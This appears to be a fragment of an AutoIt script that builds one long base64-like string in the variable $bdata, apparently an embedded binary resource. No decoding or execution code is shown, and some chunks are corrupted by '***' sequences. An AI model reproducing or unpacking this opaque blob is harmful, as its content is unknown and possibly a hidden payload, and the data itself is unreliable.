	$bdata &= "RiQFQN2852HrDeb+66gxxkY5hWcZMPbWBMOASgmEJtyVCaoC1gQUf1h3ku5OyPwPhrU6KnuQ4CaEACwUAOCCmhRNxAlDx6bYVA+/FCPE+FvEIW1KbGYF6dcGoKxIPTkAdgZ/yyGM2G38BHBQECjeSg+syAQOflscAVSiZpw2yKal2O99rRl8UaeYCBXGm6ox/P+A+WZ0ZEbcM/FfMgAwSOvuQhQtRJVkuZa4OrxJukJmCf7BMgP+QP9qUS8eVRGWajBh9TEpGwMacXUCnWHYwo4TsTS7cI+O9wh2RudKJV83gd9wI9MrelNZG9F4DGbfZfFtw3LsBitG6wo9OhPT99o7+Dv84dOL/vB8JLnoxkbBchlTxVdjkCJwrAQw/hgGA6KkWusbIaB+0wzSfB5/Bbf2MvCgchewS0SeK5+5RkdYSx8KchgK6FzASMoZxkBYk0lCJ2FwgVXnk/KnClRUfHOi+aBO02My0KAwLQO0KpAal59T7RHOw"
	$bdata &= "QKlQnbNMhA9imQ0qjvYE94tXA8Q3NjGZgT8xScQdgggi/cgBy2NdwFCZsANMEKjkQWs4A2Cl4XrFNhaoBLwh0Qpgz0yA0hmzH0m6gCjE7LTdcy4GfAJTgwiYVemigGrh6NapAF3TS0LmxaKcgbEmdADzhhDSgOTRC2dHwyBFf91GDTgfC0NzzgBtXkFLKRgcDBIRhY8BnBfV9C4TCz583UbVQEZ5BoF1mINVNoKuN6S1EggQdDi4GIpyo08MJzJ+LEAsBwryJxAUVcTpvsgaR7rWG05QLjAYUz4/HwtAl5J4TQoFAqKB0c10AOv3PmIX/4v0ObYIRi04s62s+scM+jA9UBlxj5pbrciFTNldF8IRXRaDiymbmZ1Gb+JzRDC0QKqPURhfrGRzXQeQXQcSwNj6zBhJT/***T+ROsXFAOmFTnEPynDtG+kBFtAHBILGQ23t2pxaAt75ZmKmP+PFnAj4AZy6HFLQHiqAOwIAYawCgx8bGKUYR"
	$bdata &= "0JIid5wZ37bz7VUN1+EUjo3UXo3HXw3E0EggizW20WXfjZGgiiPQI4nXEIyWwGeUEwDpQVnVjAiweHBYDQw/AFShCkxIPCpggbAzrRJXUnJaCqS/gXhB8PBLIG+JSNhk07KSb+wpq8ZvB1yShonTOVf5pjyAVs8ieaj8EzoBRjMz3sYaJr9DnklRUMyAW+FClDIN/kKtOfFLmSCyEsKQzEQAhhCAUlRuIGlu5fBnAEbFXOWUkaQT+PCHYR/pkCvh/sCEBBOyBy88JdpJ5GMgQ2DztMcEF72tF1LLWSZAzgiQfDKQFgTEM76A6jjDdZD1HDgv3f2OaB1F7RJlb/SgR4CYsKhxLuAYEKw1KztL4HwsNThP8GYAeE54PaHtF0DkLDaFDXjoGXhOCu6mzrKpdUBJCoCt0vCPfStZwOWL2gEBBQWkR+RbAYeEkw2JqINO33CAq8Xi6JXcQEpASeaJbRoDUFFNJ+SugG5tyfkSFRE2TXIFXrKZu"
	$bdata &= "NiRNLEmKWapaOp1Zc/7V+AJAcWCwBrtxd8to0WAPQBMy8CzSSwDmehId0OQRNXu4e7ETDB5oFCyZDRXoKgmIEaF8+qAjlUNc8DBPn+hK0/TKAPiXsNQqhrUw1mQrD2G3rTaEE0HvIHvEABvA+z/M8AgvzA/sBctKK1zy4rB6pEwmstkRY0kXQXPGZ3YiNRBiGGMwKRfhOf3G126UAnRQqdGEIRptg86Uah0l0Ckx1TKDreFJfBPyKTgGA+TZCRgKAODRACFQVuEUu8MKEl9tiUOtbMjN1DDJ15nb7EGhKIGR0RQhpdEAIauDmb3Q7eHQ2pNrt1g1qL5oC6yquaHQfwmyaaTdXd3QQC+sWfgEipiSg+e3cBAPrBv5N+wMQ2KFgniAv9hLOKPyCcDgqsIsO9TaqMKiLsEzf4***7gPI1At1EooGPM6Ew6ZTqjxDFvwKEbKuEP4+g8+hdrug7m5YrHQ4DmN0Ewh7VEUovsL0MdQLAv8/9QnE"
	$bdata &= "RqgbhGy0i7AntKkJ1q5iwA6g5nIC2hMrUtDcMhPn1m1wIXUynQqmc3QFIoUrCc6oBgEhuNk/cPA2UAsCOhbID4LhIxA3gd5Obw+PmL3K1m2MJQYdYxDkAmSwBtAwWPkujh8EZ35YhhtG1ilichYE40M9zCYASvQHS3NxWkOBsEAEiC1AzYRPwPceAS4QRdQELXiGfzbO7MYALUOaHCsMVrAD5k38zcYYAgQquobrHh/AL5QE60dGRm/XIvWCSIpS7FToiAQLL0oPAODItlFp+ENTjX3sZLwwTYkNZkGFoqcBR4nmj+t1rpBZOocEJGo6iGz97gbybdWEjwDsihSci9b+8fMLa0g2+CDeik0EawwDDyiRHM8HwC1eIVgxBGXrBEfQkoJFbObjJQPtDr8EA2XVZPI9zo+3LVBzLa44A0tnMGcdgFsCwuFsQShYCKxr/7BEckEGnIDTswq+BP/0ioZEZ1hbK5MGEx4MA9rDjQUDisweVLXBp"
	$bdata &= "6rUpC6+gkgpMfkMF7zAw***HF/O/2o1gikOx4hvfk+hvb1E8wHfi/PjugPToDJqOMhPYPevVjdVnQJhhSwh1G1sn0l1EyoJfPgNsLqB0J5tMyB1MUbIrQVXbF8aSH3xqvZs/CW2QtPiU***1Wkf4YwNcJ7PhdGUOup8Cm6C0ScY+MhYBRQthavzEsKYtIHigDdvBwjGO0ZrQWg2tRr+I+EKC9qkP2SwOrB7JQIZpGdkHLygQ4HIpDSZtGsSrW/uSnC2Cb4GNu0QA9r+sfwBgU+Q3iEO/O8k4qdK0Go75Oyr/k3y8PCqnCH8A6js25bkMNK/DlQCHahqRmb/iIVbugkZzZc4XXW6/r/tDLJdPIV7MCDraYpVw+tkRjyARUn9rxaWQYoOgPlddDpGOjL+t5tuisHrBsKK0TrQdyUqwv4EomBNIPoETv/K/x+Oi8ezAdLjwegDjYQFCBhHSnXlMtLZaZXG6xr+ikbBQmwKjNk+SENY9JaEBM"
	$bdata &= "MDXqI9BNfkRWIB+AMOjPofPAA4Ft5iosCB6wq4AesQTdiJ2CcMNPMwhzFRcfs+gPt4NnQ+Dlh0OeR4QPfjTwAwEJJ0Eo0IpwOFIR7v5mpv60Dw/rf2PXImU2owW/4Re6VvA4USPd88IAK4oe63BgF9g3hfVX6kdN0GCsJrSUYLTK34IJuejFA783RYA6CgTuZSAm78QR8qKPqCqaGARIJ68PRghRR4e8bHoGBoHl7JdQrwBTP3VLYPfbgA4PoAC84SrQu3DxR0UQhwdEwzbBG+QeEqdR6wHKCRFjyRryIB3yBG4A+kwQNIeGk7CR4Y60+eXhI6AJHci/LZ1HQtVTgC81ZQXbFsc6xXcwQEVnXTBl9F4b7bqOPfg+sHQhem/QFKjUPQmQGMETN0CAWfBXQok8OS4KBgVU+u8MLH6BD5j1v32IPRAPfZczFGVE4m85wuKSfpPw0GcesLfWfBZdgDhWDELmhF2EDEILiDYOsprUg8mhgMLkG"
	$bdata &= "PZpSB5BTBR7HYjxKMECsKCzwoSIUOHkYWmAs/wNLPKwHHKZIs7vRQNM6ppEpgoGbCZuBra20D1usNQvskBB7rA9NYJMSKUiryRov6GuxGSv1aRpLQ0ngY+iWTFOAbbsMdBc7XtFQOyE+HMwCMIdLEG6pK+1d55IB4AW4YivCEdg3SV3yFBvVQfFPrZwAZjb/tBmbmcA0UTMoUHVo3VZU6qzqgv+bNnN5RD1l0hCYITRuAJ2zrIpskHopwiDnEAXVD8GDpHuxpHlZCDZ1pUzgoddThctiYuBgiVpgkNK0BCTBkoBoJR6xRP6ecmZBBGiOYkJRymUuGGxjoArY0DkMBeXcPxnPogFCAQ1jrdeY/gFm/+Ihd+cZF+gb5s4wKqPjGRfkUh43EMhn5YhlGnY5mHQSAzMHaEFUoHmgNFJ4juiewmGWZiVGk45R3oeQE9zelkWAm+XU6t5ExsgF4XblKI6NWU5w1URakyDBUU15Yo8tGxvspBYkF"
	$bdata &= "zwAql+fIxwDoABgHGIdUnkMgEAwYz3dLJ6uWfjyB//A0AkZxGP0TjdbCQ2mwP9zDDTMht1flAAN3TcXTuAJPAVje6d1QGAVGZFNT8CUIinBYHKVg0Ex5FByYk4FQGE4MRUaBsaedRzsSHsAwuBcwEFHGmbIjOZXPdsaJKAL7bp1rgOmYNuR+YBwam4THjWXsBYY5SiR/sQ3kXwUVoIPEHH/jyVihSeVB0OJDVRcI+zZw3WGFhipROwzHBS9C48o/WVEXCDZDIycdZqYJQPGTOTRU9PgrwQFc0LihRlTYGXgqYxFZXQUZ52S0sPR811JySZPxLSYHB+hVYQc5FNAIPQPMXrrQpyi4sVNcAEJojb5C43syb8J+QpmhCI0fAXI2jUeXaFQInvj4HlCt09BYa1H425Hb0BkCMjMfjOiDQVzB10W9iq5M0Js/B/YzjUah9r6MAXi88P29hIzGRUhdPaCHtKSmXL2JwpG0Sf4DjXD/81HCkVwNw"
	$bdata &= "xDVgYNCMJ3rIRJcaCyyanxQUIVWqLDQeAyD4EceGiNmg/j0WZJXJEVA5BeYaZyZlUUTwmd9rN***UnxFxv6XeeAeg4FvIudXPvb/0syzwKA5/6zP+tauz8TZomdXii/X6Du2a0Luwjs2eWJlWwYm929viUFvGAMxjUAm4qNYdxh/P8O0OHQ+dDBisEkD9dEgeEE2gLoYw7aA9gy/yPN3mbZq9nJzzovIK1ewef/8eXQ/dDFisWK4AvQ5FpGKtgCCsQX/MQy7NoVeMQT6/b9t7NFxe7DDejD271iAtNz96jbrQv2hWlALAe9tnF2B8MPAdzg5MNvTwaYiFkJ6wdb3sEjBTtgqSB9ILtHLY+AvTkAf3jLMMUKygQ+AkN7rKFlxOBnY9/G6PB2YAkt18oSAboWrNhaGC+4jA1p/FjuvOBQAWUMQFWBRprdKoSuEq4yfxjZbQh+y0icv07c4bzAsAly4NnwWDTZ/d3ZxAB0aZAEonZTfCbSyn"
	$bdata &= "+eGgbZbAZA41nUw6nRoPAE7PPD3NaAQwUARwVKcpvrQM89CcrdAiPg7EYs0goNSn+JRHQcL8D9BtakyAvB4QseTAwk2yx13kpBBgqpfACC75qDdYcBIcNujWhsyzwkWFrDzT2SENF4HB7YS5+Ahga4EQxlomEk2etAnUHhU6SpndmpJtDEq+sUJ8jKsdl0PddfsSp1Id2m+jIYg/odBLvJLDj0AibZrHIS7/1wYorh3B0enHae+X7vIW9zx9wNILzrv1GkXz6XC5QDdp6065aeD0AX3zIQySu+RDQr5h41amYPeRtwgxJ2CmzWYA4Vud385nBU+PIPEOBz0CwIxcAA8d/St1b6EMwD2cABJf7t995tRkZZPIXK0HAsEQPAFCipTuKfNKHguu9/MNFbEXghbgvKgfk3g9v53qIIark5un/+A6huyrznfbf7wc0I8w/mwP4NuPbfmsHn+dcmx1QlO/XplvcZHKnwECz1WO9tlVeuYlZwNlj"
	$bdata &= "wesye03DkfT7TH8MAygVc4bvlpF3zwLYBA6W2EHubbnkQFLPFviCaxW73vPfe6LL6qthCwQbN3C7APe+90A7lLsZG0fe+3nufQlDswQMk0wbG/B3uvcpTKN***uZWxxbotCn7plzyMDDwTGaDe3g9CWgXBW58+0LtFy3wsAPCuqBADCvQLXA898wZ3gvQgfq35Ah85qWb7o48xiVU2QYnwlfSu+Cz3bpgcvDE0hDrafQGfTpeg4HaBu4EKM4w7Xme7RbhJi3D8Q1AFlhwULyb7HDm7hDugmQFo3teCAX/4QEtDKZajtDVIp7hA3x/g+F4964LtoBIWuDclFjPsNs08VBZ1+QX/8P7zssUeAPUmC4oNT6w87TPkM9m7NHKcOD+Hj6K/7qADPIrxPoDEEDjPobfsKLJSvO+F082Csfk8S1yyUScPXiH996gVuqk2Q7FzNxZ97zn9YHgzMD+HvjD3LlXeZX3xxDr8wbja/N03juMDMYGxH4T"
	$bdata &= "xQrB1d3/wtvBwadgM4B+yEoQVMsUc2Ia79EgIMn9g9pVhxRCC2rwHLDxgAmHdRxHn9OFksJxYPM0jtOnVbbRufMihG7ZFJb68eZ72u/bDu7ztnbT18KLyqEcjtNC/xhngeo+jRJfPQkP2IcROFE7PLn0qweRd/BUDVm6NHth8S+w4LuTuQH/A7L36oNjkgReEHJeiAsAX/qmsa53SLLlYHf5rHxkC376/NemYbYFnvhbPzSdPQmCmjKH3gHo6zsn/4fVfCVRRRTAsfxewLjwQzJFqzzvIh7EsuLU4IKTghHgdFJxqgUKAqwAgXcF6UDwfz7GkyPxGRwCY7x1oZyDv3OyHN3bMcHhDSPBupUCfA8mAJbC2vAgh3339uFwzwTKXsq6G2KYJjwLH9DiYeabPBtOg5h5V8ngVNzLwmHQdErX4VVWBweMkXl++fYgV5yJgNrAhI0AeISgOHVluXRXgF+osYN0I1UlHhiCeM1CygWp/ToWww3Yw"
	$bdata &= "0WUhClytclHATcrMky+4VLkEhDEuu4DO85QeS6A0NLSzwvCgwL4Lvl7gBqd4RYvcMhp123JuhwYDnaEocPrl25gOrnawQ2iCoDh2D5ZvHUgdeL8PRj6gvA/RRe/dQMenGpKxKF1Vd7CA7TyBgkL6nzxC9H78DBgnwaLFErDC1zgxAOlgnIXJuHDebEncwPN0IHBy9Nd0sLrY2FXwWB6SEuMTmy42xONcLoazTpRfnyajOPHdyVyBV53HtFRgAFuVwXrDF3ag5k6HBA7rbsDN9SDwhEIDBha8Xa0ceoIiVlmQngQ1/veMNjcfijABNQKmJbQPBRM4u/+UljcRIHqgKPigFe/sDSMBrHr3MCWdjHejvEBT0MHzkwh1MRgThpLHXjgQ4vyge56W3HggUBIPwKIbzDKPqz32kpstGCaLovCJuDX+cAD0Ky42PgDB6tAeoUUAPnK9vF5pvdu0qDJlPPKPfDAA6hQsAMHz7M2V/bk4tzZ8MEpxI"
	$bdata &= "iUyD73A1+5f4S5vcIEg/4Af05e0zreIe4GzyIg8J/EwPN0Rke6GGUSqhDRcYbpuhnHAjdATrTbXovHk8b9QjoGcrj9y3pvGKkw+MCfVsFv3e3Ru4ejRnQVWehQPPdC1Q/wxRl7IRFp+lwa4Vnmg12xcYAhgu/IPRVy8FTA4iCByedGwS2PeK5VTY/F1APT8AGMHEh3mzPCwEvGCJ+F6GCm8QgouH2Qb1fjP83+Cu11SyLx6w0hMu2kD/r02ereyXQq2gz2hbRgbmIS9hixjbY1X4wUBN5aBcTfQtZ8cO32wkD9hk7IG1T7UmZ/LCsdC8BcjEgC9tW4vUJf9+HrnzlnCBwC494A2UR6n+ECw9ntRuT3m+FDt63gQXXSJsNDYQq9e+62IHVTXOzrAmUYrkazgAR47u2zKA4qsrAEXlUrh+XX2ebpMe3p6+Vad2INEP8/tFDwHARYBVIPU4aCd7CVBGuNA2+gYQ05ryfDvBXtoaHgHt7Zs5X"
	$bdata &= "U223sVjqKlfnJ2OEndtnZ5djG8MNw2BoWEdtoBjSYMpnOkH7odA3juHk2vrCh+GPxVnskhdeS9FaTC/tqGy2kdpcU3WYiwYJYKa50Xq7rZ/cLoBXF3UUICFZOH1gD8XaYqJCUSCWH3F0I50FRZiboOzFJJn0hTmHYUeQCGGSapEn4BS4HsZTcSMHG2RnCKyZW3FUI9kLbWEvUgvLchhZY9N4ijl8pE372PTlVEHV/zkhcZVmTEVioQ7dG2c4k4dAKs0g8Wi0Rpfjsi10GdQdxLRQgDTlN0lWajkKDPQn7nuHeekmUbCdyegul1F3wTRQV2CzdGEYfIE3BpiDeZHUmFAjcYSaAZ5pnfPZRu20oG/d0WqDrVOYHaah0WVlUYBArgyC2dAXcWVzcxyHoWpNWAZF1G/a423fYF5l1FDR1CDnwtikJ9i0Q6wi78woIwU1j0veILXfT5gfeZGcbuQo5aGC45SxaLp8LaGB2aiwbZIENInsAyAR1"
	$bdata &= "0zRN1OTc2OBqBx2DCKXLcNN3TwNKfioXjVk7l5YYjcODNNwlKbkMINhZLQTBfLBatEEXWqgQgLz+iXZK3F2WBAve+GgwcXhgmoAGNnfE3Hy9tFSCxEwXwAhyCcCUHjvdInINoIQzs7FbCnUFtOxvaqdZoz1WHRMoZC9mObzT7TTcNS87PwSGbQ6CT+kv/LsNwHujpjUgaAgQzBGAVuegAMJwBs8Qjg2hY9BFFVNePNpmvy6hFStWthUOZGvS0tN97DwDwi2qdBq5uBFS3L0ViisFRW/Y6wYhfYa+JlZTaj+WMFcW9SDI5zDMFd0DeD9jDzldbgr3a7P/PosAiFg/6wcTGG9wBGr/c1upfEpoZxALQARpUCOJrQgVHtRKu8XG133kcc2JOBLcI2UqlcHYx4FcwWgPBTCIkNQ30GyHRPhqQEbaN1CiSBFB6aEk041QgD4toDlgf0cjOUbLWWnAEA4a/5sK4ib0KzB8FTw5fxFG6++OFCIAv"
	$bdata &= "PodIew2sOJ2OnU4ab/vBeFIAfRSB0ZwMH31gtCCdD8YOU7ggC6EyEjknqiDB4fC3iNhA7kCgw5dFCA4FEl2RyQERhEn3xcwi3Uw21EwhJBj9CQZB2BV+hJUAUDHUSUDEvBCmJH8QOEGcTtmDDBqZJmOhyJuoO4fjYdimTI4QxGzI1K0n37RebAK0OsLGf3ZioGIDFgrAY1f/78gQwfxX/9sRixl3O0DGsOZGotV+PAmDFQHlNqaEO6HkCOL12nSbVpgOMWvhMONhAIlnGD5Owi9we50ByvCA6RVGCujksJ/BnD5Q7JwSeEUBd8YyUFwLFkd7KWI9nJAgGLrCRU7KaEpCPAm7gfJwQLB6z/xkRtr9mAbejS14wcRnPxt2k1aa8lCTSALJGnJTxJtTZwQKEinr0YIzjU8/MQdhCNdVADra5CsEnHZL98IDA23EIpBg/r/7nYO0p0BBU95EoEPAFwmBX5/3bv/cwjrGbgZOS18DCkP/wXsMg"
	$bdata &= "7wtTvZOECaKEXzA3Y0UQk5MiAUjRNbNHrUBoOHkJo7FV8e62MAdw6UYTk1/ftByFnjZhmoD7cF32af5gy2DbBQHbQPslB1D/u3sxUTrFYlrlBSU+sMF1ZWUmYPhZFWqjwxIp1izQwARlx8zVRkpDm5sWBeF1itNUMYWpgUtA4b+Ja3u7QeuVZWnOsuLe0SPO9TCNYCWXbd7wlEMSdqBYFWLQpYwQAj3F9IP6BCGN/wpjvIMhx9FjvRGKpJme3Qfx4Ofh70w7bZDgKmInz2f/IO0dsSzH4IxehOdWUWQOoDJgsQQVuKB5c2dQ2MAW2mt0kAD53BchkDCNkxIosccMFkNwmCeyD3ESooqsRiBsOLFrfFgCULkdnYS3UKcBi9NQvRX1uJMMAFtXtA+kRJLgY8XDMXRqGtw7t6TNSEzdBigd8IbhsvWSuEcUhhT5Xjz0wOhgCPoETzhioR/g+VNh08PXQBR1sUEBLgTgGStOpB8DA2yEdXsYA"
	$bdata &= "1HMYstPCiP3tWtsuBVetAYYvoRYA+PS6RsSSkLyAMgUX45zvDdEpWVVDjIwL/UUHHBAP1OB51Fa1tBGUOlNgUiR8PIi49XUhZeMN9QZN8ScjI9OQQUGw4PwhTHW211h9W4osMhdWHKbncEAk3M6QqBIkTbis27i48InUQS/yzIkJGJFoS+vrrPP8HKgiHiQyqg9FsigVGgLdhwwcTPJKLhXYSODYG4ogB/Zr47kaE277gdDK0damA+343sQSkCAl1n5IExkKXatcSg9gAH+9vmwMaPgQ8PAZG6/NO6+MxjzR4ndDCQUUQ/wHcNhtXZjNaRkFEXHT5dg8EGlsmSh/NdAzoYDQw3SJdDWAwGFE2jIj2eyD1htHp7En5Alz8C4MjoQd6ljYHDz7OdFVHCARLdEcCJesQBj1QmKkRfPh0I8nCS4ElGLy5etPOZ9jdMUUDMDSoLKNzaN43ANYHAGNhEKZwptV5zSdKVrQgEBEemCUidaw78Yn4"
	$bdata &= "qt45F8iKiDQYzAu38H41oUpc5snUMAZb2L44GLYueAoOksm2NMy7UTR99OjSN4T+pLUkuD9zSgOW6A9q+f9zQjiiCRKgqo3OJDYA4yRcDXa9E/tNuH0D/ldWgUij0rwsNnT138DcAyUMoGAsyCrQDEEr4V4ZsIQUVCnKEJZd8qHgXuirsxjQt1sxpCKaxaMv6wWDezKNhY2Exg9zJaxTIEk5tpQU7rAEBg4DxU+PmC3sdfkN8sk+K4NkEKTGjqDnBoswEnQ0/9eOO58c3q+vKPy3pGSyIziy9Eq8BeARxnXjjSUoJ2FUkITXwgYNrPB1FK7qWDvFSYAjqIox0pevVM4KrHXPJND7CfbwQNYezL7Kz9t1DIWkaDjmYNtpHCJ/LQ8RKSXrLEC2uxrWJFS/CTvHvJWbhUIfTkdcXBFHCiEFuAIwCts16QJi0aCEnKAY70jHylM5ObrYK0k4SSDyA9oCTwTwO8ty7rrCsHGyDqgINETcEF3lW"
	$bdata &= "2xYJuDFkHATNzv2BZGOAgSk0hx0Iks3IQHvTmCyMyUnPk4QupeSkN4GhbgvDVLEZxUekIuUi9J+13/6130ka8kAflyDZDkIPD0GfnDlHUID3yA703ziAtDaF3oAPY56wE5k8t3P3YpGZINePZAkH4EgVwa5Tj2RhD49k1wZ5MqFLj2Ngh49jz2VK4OGDj2SB4oOEJ1pd2TmyBpsitP65usHyVEYodHQ1NRatkgLCS1duDzGt3EID8hQqxaU3co6Bs2K/2pK2VNXv07mQLtWDKKJuLu4foUBpL8bkvfQo0QE62BWky9prUpIM3XT6JIyJ98z8A/IYGaVwhATtPwzGCL0e0ECMr5PsusLhftWf+Ik+BAL8BL299YPtFZo6AS7yrAkMfRJgvTFcR0QoT4crQgNrXPRQrpTxkwfyegLsR9bdR6IYVw9s9ZiE0eW2Wkoyo4c8FZyq3ElElZ7T8p44Bro/xq2ZtN8qg9HH0oaHfgknTKqSgOIGE"
	$bdata &= "BIFxTkPuUbwH9rbH4BdTWNeP8Sxpr6+vxyHlIJ5SviQLbCBI6O2o5KvP6+c6rHKzaoLWh3vqbD9XVaycjdf0l2Oo18Bv6HFHIhFISA0xwUFE/IATvyKxiybZjQWEYErGloh6+BalBYYxuIlQhNQGlknUguELz5AnxNjAUe9kx7sIwUqPwcxYCdHBj6aipYiQHIFw60kBoMF1epdCevGNQJ2NzgMQst/atNnFY5UARi8WvlQUOu9hx5Ak1TXRrGcutcGkxeXni5LqYFQTiWEKUv437dlyyCoWage2DYwAD9C3L7C39MDvOKbVT0WSAiBgjjTYDNZHVEQfhQhbkGf8QygUAkvj2hCWAuwDc+/3dci9OOBT45UkNWlmfO6WUVkcgPiEkImgCoSP53pXvEkeuuk9zc6xYXjErlStjY6wrg4F4hKJXBBeBZ9Gl8hvbgAc8uEiYzpq5jUsahWhbkTwJL8ML+Yq5ocJeJBrgwCBAbi0++ad8P8tS"
	$bdata &= "JR2AudUAaZNDHR2SMufSA7owjLgNaVvu59BGUrBwDyjkgfUnoAU3+3BhXUEwpmq4RwPjbHjH2oJOJBis/7ocFb+iLHxxkU/9VSusZspCRgkq0dghe5EJSADcxQ+CglAgrBsIho2kU0GRvS9CxOxPoE+wocA3LVZm0pIUnCR2ngJi8IJGmGOwA6lMHBFPJA/mQXKRZO8fkAXQhF3lhCsrXVINSwgrFBRroQlYsJFa3P7yKN0YWjmUsL/xsuSSAkgLBfUmTuheBfdwfltaLBT0CpLbQBgEba4dzks+Op+j6lAUUBXY/JN0kCiq1KBDCwW11W2SgUqBRrRPVRsN0JxuNUGqlhVTfKUp3i7UghPaD4x9r2w8qA6o4ql/DiheIYfxIJALJ0PkWvpCITUUgHqWrKAHEjQneMXbz99FKJtUaLwlditnTuc0EchFWD4m0UMLNlVbtawIjA4KkTLOES+sDBIBLlao1NDVsXr6EU60JHH7NAwxcayYB"
	$bdata &= "vCLAvtP+B8UKgH2rABqyN7j1DYoapLCEvUiodZxSlfUmIAqGxtAE3iQGaGT8A0KMikWrHQGm2zTWUsYKRUbRGT7ciNswaWTgdRoSANJaNsm6ZS/uL0jpUYKcK8YDhcVNcJoCDraZultg1fRMgUY+pM/0vU0wco0MYFGsTawBDNwDDIQ1NpruIS7x7U+TALAlcJ2wJoVd7Q1lK207QOq7YV0ItAFFoL6MILJL4wapfYgAOXHQ2jfsvnPGEQ2BT6PZXId9gHjjuQDtwFuYBKDrZDwuPALwZRGrULcOLPkhUAj+IMJGRoM+9lhCuL0AWFWIRTmIguAbCwWKJWY73kBog6+QlIugC3QdHMxBSICaP3TR7cOL0IthOaYPgnnewYdHjzNhzzqAsGoWjsoCnJad4qwahugasc2wyGWgW3SgJbCHK02c/PaPGkA7EXMni1WwurCKEkGA+qHguQyu0MbkQJ+JJve0iBAL4qRkctHsdPgMwGYr8LuUF"
	$bdata &= "jupHBq1ygGUxRscfFDwsCskO29yg2HlhBQcOgI0ncoB8xwEgnYxMYPMA3NDAqYSQUE4DYMggcCwVDwmJyWilMSqhk5NCqoTgRxAjpKDA0THJ0w2LOQirnf/NJXNMG+kLQGksGgoaKRMuV5cNWguSSykQJSkA87BtQ8eRwo/A8YisARAmHhusBSEsFIBzHYWLT7SaKsOlAgBDEEuwnCVL1Ycl4EqRlbnKJCglyQ9eZeumxaq+MYANWv+Ch5B1osArXQJA3WUjwep1VZ/yqmCbA0peBxHtKSsAKLA5ro2K7GLDv6iTZRR/8EWnP8wj7szhMMMNDZYlXVoUFsooExW2rfCxJeWrGQFXg6ODg4a1yurTYDXBBzrJxNA4MKi3p2cgDgaq6GGTGVZHAxARP8/asEDQJhfhucRglg0FRgFAGRrAml7oJAHInkFR6UFQRNGCAUJMqtzwC4ZC1EiCpW4jdZ7xxRR+DBpD884oqHCXz6P/IE/0H91Tl"
	$bdata &= "PXGPRHEJot7LuIdaGUAcAgU8uQGJbA1hMmCKAJwgrqWAksgBwdios/0EqkjmY+FwQSnm2CLgIRarBb/DCVW4NPJ8bmHGWXy6h0GVgJ4VDLov/uOsC6Ss5mGABtCJAphhCWQcCx8agYEzFJS9TEWjuKMRpBpyZk5Ioj0DwP0wxyeQ7GXQfVEA5PBjGgQWUMUXMEC2/kBSwh4ngghrBiJ48qiQhrSr4gvwVJUcykaZon3BQoEAxSmIQZCLxDu6bJoBDGDwPRLEgvdUTIfpWpydob/RQQPxnNIAwP6HYJTp5BLLwrMBsAYBIIJHLJeAylNoi7yu7Ti9lyxkHAIiOsl2XQZQcApLa/EMTrAgoizg+rBCTr8fichkL8Li6Dwdo0nwAwNcajcu5gIj1LxiC6nwvGkAlzdMFI0jsQLw4uGB8FTMotRQzKAFTHVgSuIWJSCvBn6oKhMDnBYb3p5Qp/o3ebImiAM+H8pSh8r4jsUkaNgSsBKIFHCJW"
	$bdata &= "NeSaPZA1hWkKLxzQDDxio5JMJfMJ4Bkr4JKEAQymNfu9hKGFc9o1Bun6tbfopmyvHG9Nq0IBRklMlS+BK64t9+BFV9BTguwrAf00u/3NHjIHHYCQU1guDLnBsLZiNI8qq3Ai8g5/8QXUNzFn3+SPwbcFIBdF2uzuluSdBA/tv6zI2eeIgGRZzCgeXIdtkKzQ0PFS5pTb8Vw+BoGETwhQcmTKuzG/9BL5gafwAuiB1BeOeEtAN1MtBOULBm0EFojYOHIp8+tlk3QXrSQIrBIo7pC6eOAw0U8+xJdhG6Qf2WZn8/L2BswI26leJVhjfIDeHCPDx/1PtavgC7Lk8S0VARCs9UwKsGl4gJjE8FrdhX4BMTqplpBAMeU9bRGU2GBM0FKTZeiYYFEgb9DaztUXCFk95TutdAiSARO3WRC1j4cg0W1bPTpFbSfOeq8oOCDQUGA4Mratl2BCa8V/ok1CYc2my8QJQoIsZFnCUYNbGaB1a+PnNXEjC"
	$bdata &= "lUlY4IHCk7x5Ad7YV+qgFV7LY95RxwZm7mfCLshXo584KbQm4IJcPBngThGe1SlZdhctLn1cAnUszZhXBGcAwmk8b35DOiciL4ArRKGzALfhCXDOt4LSd3k5DU9x7Rt1AE8AtBlwWSgg0ASqVlBSUc+SNn90GQxqaAJqVI7gagwSAvgbBsoIYLGIsbozpiL8oz3wBHIJgU2iIBJrN2i+RBEEOwk8O0W+MfWw7AsoUib/0AwkqXQPDh07QBODs4UoAkA8S85W4dg4LxCTQesCXmRoo1WxfB4nsmylNH4MCBSw7KegoA72DYkNGUIqxaEzfQpJZqUW65Wk2+AT72oE8r8kt7UMEGolCuiVxQRNXqkrJBkSX9148Aip81BB5U+RcykHzfDvFgQWcwcysPUSJT352kvIBRRV/ZKpgnNQCe0I14ZABggI74hTH1o4QhngAP4lYg5XVd0FUSRJxJ2iz13S0SjiQT8yjCIek9f8P6QNu2AmUChSB"
	$bdata &= "kWojbZkgG2ygl4XGj3CoVWYYZUiuv7JLNdSxKplszQEpOfWKHANOja3gWSaDAY7dHYt09CVIsqLDLNUithak0g8fLPOF8MuRbxEs9ERPIhUy8Lrt3Hwtyil0Vhkix+BeQQQBBVlB1RIhZSgWFRRQR8RalahU1E3k0A0VOAYEYv0BSh010vSiWsMsYUNNKhYWYhIWwNrwgQobwJXX735xwfw6IWpwWRoJlAXYQGMnTVHBOAzVisyEAIrbmeCTQI9cMdHCOvHAKnvwb/HBplDU3VZdsp63ldqsN1M8skn+EdXRhj/c2ola5pCswnpAwi8DwBHrxQScD/YxwGnFnG3rBlk58MbKOK+geYu8MPqETAjRN92ucDABwsCZ3tVEytgXMLBETl1bivrI/PelHtH7XQKPR0NJJ36JeKCE+TblkjaiV8tQAeSEK9T0E6anLb/DfBYi8g1fVCdnFor0XQfUZ0+D6IQQm3tO13o3qJACN+7USRVZvhbpC"
